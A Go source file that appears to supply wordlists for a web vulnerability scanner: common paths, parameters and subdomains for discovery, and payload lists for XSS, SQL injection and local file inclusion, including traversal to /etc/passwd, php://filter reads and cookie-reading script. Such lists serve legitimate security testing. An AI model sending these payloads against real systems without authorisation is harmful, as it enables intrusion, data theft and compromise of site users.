package wordlists

var pathsCommon = []string{
	"admin", "administrator", "login", "logout", "signin", "signup", "register", "auth", "oauth",
	"dashboard", "panel", "cpanel", "wp-admin", "wp-login.php", "user", "users", "account", "accounts",
	"profile", "settings", "config", "configuration", "api", "api/v1", "api/v2", "api/v3", "graphql",
	"rest", "swagger", "swagger-ui", "openapi.json", "swagger.json", "docs", "documentation", "redoc",
	"status", "health", "healthz", "ping", "metrics", "debug", "test", "dev", "staging", "stage", "uat",
	"demo", "backup", "backups", "bak", "old", "tmp", "temp", "cache", "logs", "log", "error", "errors",
	"upload", "uploads", "files", "file", "download", "downloads", "media", "images", "img", "assets",
	"static", "public", "private", "internal", "console", "manage", "management", "portal", "secure",
	"token", "tokens", "session", "sessions", "key", "keys", "secret", "secrets", "db", "database", "sql",
	"phpmyadmin", "adminer", "mysql", "pgadmin", "git", "svn", "env", "robots.txt", "sitemap.xml",
	"crossdomain.xml", "security.txt", ".well-known/security.txt", ".git/config", ".env", ".gitignore",
	".htaccess", "web.config", "server-status", "actuator", "actuator/health", "actuator/env", "info",
	"version", "readme", "readme.md", "changelog", "license", "search", "feed", "rss", "atom", "ajax",
	"include", "includes", "lib", "vendor", "node_modules", "src", "build", "dist", "data", "store",
	"shop", "cart", "checkout", "order", "orders", "payment", "payments", "invoice", "invoices", "report",
	"reports", "export", "import", "webhook", "webhooks", "callback", "notify", "mail", "email", "sms",
	"graphiql", "playground", "altair", "voyager", "metrics/prometheus", "telemetry", "trace", "traces",
}

var paramsCommon = []string{
	"id", "page", "q", "query", "search", "s", "keyword", "term", "lang", "locale", "debug", "test",
	"admin", "adminmode", "edit", "preview", "draft", "show", "hide", "callback", "jsonp", "redirect",
	"redirect_uri", "return", "returnurl", "next", "url", "uri", "dest", "destination", "continue",
	"goto", "target", "link", "file", "filename", "path", "dir", "folder", "doc", "document", "template",
	"tpl", "include", "view", "action", "do", "op", "func", "function", "method", "cmd", "token",
	"api_key", "apikey", "key", "secret", "auth", "access_token", "session", "user", "username", "uid",
	"userid", "account", "email", "role", "group", "order", "sort", "sortby", "asc", "desc", "limit",
	"offset", "count", "per_page", "format", "type", "mode", "output", "export", "download", "filetype",
	"ext", "category", "cat", "tag", "filter", "status", "state", "active", "enabled", "start", "end",
	"from", "to", "date", "year", "month", "day", "time", "price", "amount", "qty", "quantity",
	"currency", "discount", "coupon", "promo", "lat", "lng", "lon", "location", "address", "zip",
	"country", "region", "width", "height", "size", "scale", "quality", "color", "theme", "style",
	"ref", "referrer", "source", "utm_source", "campaign", "affiliate", "partner", "version", "v",
	"build", "env", "environment", "feature", "flag", "json", "xml", "raw", "pretty", "verbose",
}

var subdomainsCommon = []string{
	"www", "mail", "remote", "blog", "webmail", "server", "ns1", "ns2", "smtp", "secure", "vpn", "m",
	"shop", "ftp", "mail2", "test", "portal", "dev", "web", "bbs", "ww1", "host", "support", "mx",
	"api", "app", "apps", "admin", "staging", "stage", "uat", "qa", "demo", "beta", "alpha", "prod",
	"production", "cdn", "static", "assets", "img", "images", "media", "video", "files", "download",
	"docs", "wiki", "help", "status", "monitor", "grafana", "kibana", "prometheus", "jenkins", "ci",
	"git", "gitlab", "github", "jira", "confluence", "vault", "auth", "sso", "login", "id", "account",
	"my", "dashboard", "panel", "console", "manage", "internal", "intranet", "corp", "office", "vpn2",
	"db", "database", "sql", "redis", "mongo", "elastic", "search", "ldap", "ad", "dc", "exchange",
	"owa", "autodiscover", "lync", "sip", "voip", "pbx", "gateway", "proxy", "firewall", "router",
	"sandbox", "preview", "edge", "origin", "gw", "ws", "websocket", "socket", "rt", "stream", "live",
	"payments", "pay", "checkout", "billing", "store", "cms", "wordpress", "wp", "drupal", "joomla",
}

var payloadsXSS = []string{
	"<script>alert(1)</script>",
	"\"><script>alert(1)</script>",
	"'><script>alert(1)</script>",
	"<img src=x onerror=alert(1)>",
	"\"><img src=x onerror=alert(1)>",
	"<svg/onload=alert(1)>",
	"\"><svg/onload=alert(1)>",
	"javascript:alert(1)",
	"<body onload=alert(1)>",
	"<iframe src=javascript:alert(1)>",
	"'\"><svg onload=alert(1)>",
	"<a href=javascript:alert(1)>x</a>",
	"<details open ontoggle=alert(1)>",
	"<marquee onstart=alert(1)>",
	"<input autofocus onfocus=alert(1)>",
	"<select autofocus onfocus=alert(1)>",
	"\"onmouseover=\"alert(1)",
	"</title><script>alert(1)</script>",
	"</textarea><script>alert(1)</script>",
	"<script>alert(document.domain)</script>",
	"<img src=x onerror=alert(document.cookie)>",
	"%3Cscript%3Ealert(1)%3C/script%3E",
	"<scr<script>ipt>alert(1)</scr</script>ipt>",
	"<svg><animate onbegin=alert(1) attributeName=x dur=1s>",
}

var payloadsSQLi = []string{
	"'",
	"\"",
	"' OR '1'='1",
	"' OR '1'='1' --",
	"\" OR \"1\"=\"1",
	"' OR 1=1--",
	"admin'--",
	"admin' #",
	"' UNION SELECT NULL--",
	"' UNION SELECT NULL,NULL--",
	"' UNION SELECT NULL,NULL,NULL--",
	"1' ORDER BY 1--",
	"1' ORDER BY 10--",
	"' AND 1=2 UNION SELECT 1,2,3--",
	"'; WAITFOR DELAY '0:0:5'--",
	"' OR SLEEP(5)--",
	"' AND SLEEP(5)--",
	"\" AND SLEEP(5)--",
	"') OR ('1'='1",
	"1) OR (1=1",
	"' OR 'x'='x",
	"%27%20OR%20%271%27%3D%271",
}

var payloadsLFI = []string{
	"../../../../etc/passwd",
	"../../../../../etc/passwd",
	"../../../../../../etc/passwd",
	"....//....//....//etc/passwd",
	"..%2f..%2f..%2f..%2fetc%2fpasswd",
	"%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd",
	"..\\..\\..\\..\\windows\\win.ini",
	"..%5c..%5c..%5cwindows%5cwin.ini",
	"/etc/passwd",
	"file:///etc/passwd",
	"php://filter/convert.base64-encode/resource=index.php",
	"php://filter/read=convert.base64-encode/resource=/etc/passwd",
	"....\\\\....\\\\....\\\\windows\\\\win.ini",
	"../../../../etc/passwd%00",
	"/proc/self/environ",
	"/var/log/apache2/access.log",
	"expect://id",
	"data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8+",
}
